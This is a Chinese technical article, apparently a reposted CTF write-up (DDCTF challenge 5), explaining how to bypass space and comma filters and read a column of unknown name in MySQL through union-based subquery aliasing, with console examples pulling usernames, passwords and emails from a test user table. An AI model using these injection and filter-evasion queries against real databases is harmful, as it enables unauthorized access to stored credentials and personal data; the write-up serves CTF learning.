扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 数据库 >Mysql绕过未知字段名的方法
  • 600

0
分享到

Mysql绕过未知字段名的方法

2024-04-02 19:04:59 600人浏览 八月长安
摘要

小编给大家分享一下Mysql绕过未知字段名的方法,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!前言本文介绍的是DDCTF第五题,

小编给大家分享一下Mysql绕过未知字段名的方法,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!

前言

本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:

实现思路

题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;

存放flag的字段名未知,infORMation_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:

思想就是获取flag,让其在已知字段名下出现;

示例代码:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d uNIOn select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | passWord | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

以上是Mysql绕过未知字段名的方法的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注编程网数据库频道!

您可能感兴趣的文档:

--结束END--

本文标题: Mysql绕过未知字段名的方法

本文链接: https://lsjlt.com/news/51820.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • Mysql绕过未知字段名的方法
    小编给大家分享一下Mysql绕过未知字段名的方法,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!前言本文介绍的是DDCTF第五题,...
    99+
    2024-04-02
  • mysql修改字段名的方法
    这篇文章将为大家详细讲解有关mysql修改字段名的方法,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。mysql修改字段名的方法:【ALTER TABLE 表名 CHANG...
    99+
    2024-04-02
  • mysql修改字段名称的方法
    这篇文章主要介绍mysql修改字段名称的方法,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!mysql修改字段名称的方法:执行【ALTER  TABLE 表名 CHANGE ...
    99+
    2024-04-02
  • Java8通过Function获取字段名的方法(获取实体类的字段名称)
    看似很鸡肋其实在某些特殊场景还是比较有用的。 比如你将实体类转Map或者拿到一个Map结果的时候,你是怎么获取某个map的key和value。 方法一: 声明 String key1...
    99+
    2024-04-02
  • mysql修改表字段名的方法是什么
    要修改表字段名,可以使用ALTER TABLE语句来实现。以下是修改表字段名的方法: ALTER TABLE table_name ...
    99+
    2024-04-09
    mysql
  • 如何解决MySQL报错:字段列表中的未知列
    当在MySQL中遇到错误"字段列表中的未知列"时,通常是由于以下原因之一引起的:1. 未正确指定列名:确保你在查询语句中正确地指定了...
    99+
    2023-10-12
    MySQL
  • Mysql数据库实现多字段过滤的方法
    我国移动互联网进入了飞速发展阶段,互联网人才日益受到企业的重视,其中PHP开发人才便是其中之一,在互联网旅游、金融、餐饮、娱乐、社交等一些新兴企业与软件开发企业中,PHP开发岗位相对占有核心地位,今天给大家...
    99+
    2024-04-02
  • mysql增加字段的方法
    本文主要给大家简单讲讲mysql增加字段的方法,相关专业术语大家可以上网查查或者找一些相关书籍补充一下,这里就不涉猎了,我们就直奔主题吧,希望mysql增加字段的方法这篇文章可以给大家带来一些实际帮助。my...
    99+
    2024-04-02
  • mysql添加字段的方法
    这篇文章主要介绍了mysql添加字段的方法,具有一定借鉴价值,需要的朋友可以参考下。希望大家阅读完这篇文章后大有收获。下面让小编带着大家一起了解一下。在MySQL中编写sql语句时,会添加字段是非常重要的,...
    99+
    2024-04-02
  • mssql存储过程中表名和字段名为变量的实现方法
    这篇文章主要介绍“mssql存储过程中表名和字段名为变量的实现方法”,在日常操作中,相信很多人在mssql存储过程中表名和字段名为变量的实现方法问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,...
    99+
    2024-04-02
  • mysql增加int字段的方法
    这篇文章将为大家详细讲解有关mysql增加int字段的方法,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。mysql增加int字段的方法:使用ALTER TABLE语句,通...
    99+
    2024-04-02
  • Android11绕过反射限制的方法
    目录1. 问题出现的背景2. 分析问题出现的原因3. 解决方案1. 问题出现的背景 腾讯视频在集成我们 replay sdk 的时候发现这么个错误,导致整个 db mock 功能完...
    99+
    2024-04-02
  • mysql的字段别名是什么
    这篇文章主要介绍“mysql的字段别名是什么”,在日常操作中,相信很多人在mysql的字段别名是什么问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”mysql的字段别名是什么”的疑惑有所帮助!接下来,请跟着小编...
    99+
    2023-06-20
  • mysql修改字段名的语句
    mysql 修改字段名称的语句是:alter table 表名 change 旧字段名 新字段名 数据类型。该操作将影响该字段的索引和约束,并需要考虑新字段的数据类型兼容性。 MySQ...
    99+
    2024-08-01
    mysql 数据丢失
  • numpy字段名索引的方法是什么
    在numpy中,可以使用以下方法来通过字段名进行索引: 使用np.recarray:可以使用字段名作为属性来索引记录。首先,将nu...
    99+
    2023-10-22
    numpy
  • pgsql修改字段名的方法是什么
    要修改PostgreSQL数据库表中的字段名,可以使用ALTER TABLE命令结合RENAME COLUMN子句。以下是修改字段名...
    99+
    2024-04-09
    pgsql
  • sql更改字段名的方法是什么
    要更改字段名,可以使用ALTER TABLE命令加上RENAME COLUMN关键字来完成。具体方法如下所示: ALTER TABL...
    99+
    2024-05-06
    sql
  • mysql查询表字所有字段的方法
    小编给大家分享一下mysql查询表字所有字段的方法,希望大家阅读完这篇文章后大所收获,下面让我们一起去探讨吧!mysql查询表字所有字段的方法:使用“SHOW FROM”语句配合FULL关键字来查询,语法“...
    99+
    2024-04-02
  • mysql查询重复字段的方法
    1、查找全部重复记录 Select From 表 Where 重复字段 In (Select 重复字段 From 表 Group By 重复字段 Having Count()>1) 过滤重复记录...
    99+
    2021-10-27
    mysql查询重复字段的方法 数据库入门 数据库基础教程 数据库 mysql
  • MySQL中json字段的操作方法
       MySQL5.7.8中引入了json字段,这种类型的字段使用的频率比较低,但是在实际操作中,有些业务仍然在用,我们以此为例,介绍下json字段的操作方法: 还是从例子看起: mysql&...
    99+
    2022-05-31
    MySQL json MySQL json字段
软考高级职称资格查询
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作